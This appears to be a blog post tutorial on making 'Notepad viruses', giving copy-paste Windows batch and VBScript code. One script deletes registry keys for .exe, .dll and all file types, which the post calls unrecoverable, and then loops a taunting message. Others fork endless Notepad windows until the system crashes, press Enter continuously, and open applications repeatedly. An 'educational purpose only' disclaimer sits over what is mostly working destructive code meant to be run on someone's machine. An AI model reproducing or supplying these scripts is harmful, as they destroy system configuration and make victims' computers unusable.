Virus creation through notepad
First of all, what is batch scripting, those who don’t know, take a look below:
“It is simply a text file, containing a series of commands, which are executed automatically, line by line when the batch file runs.”
By using Batch File you can create an extremely dangerous virus which can delete the Windows files, format different drives [C:\, E:], steal data files and information, disable antivirus, firewall, etc.
NOTE: This post is solely and mainly for educational purpose only. I am nowhere responsible for any kind of damage caused by this tutorial
Note: I am not responsible for any damage or error reporting on Your PC, do it at your own risk.
Warning: Do not try this on your daily working PC.
Delete Key Registry Files
This will delete key registry files, then loops a message.This is dangerous and unrecoverable Notepad Virus.
step1: open Note Pad and paste below code
@ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :MESSAGE ECHO Your PC has been crashed.Your Dad. GOTO MESSAGE
step2: save the above notepad text as anyname.bat . execute this bat file.
Endless Notepads
This will pop up endless notepads until the computer freezes and crashes
@ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top
Endless Enter
This will make the enter button pressed continuously
Set wshShell = wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “~(enter)” loop
Application Bomber
It will start to open different applications repeatedly which will affect the system’s performance.
You can also add the application of your choice in the above code.
@echo off :x start winword start mspaint start notepad start write start cmd start explorer start control start calc goto x
Comments
Post a Comment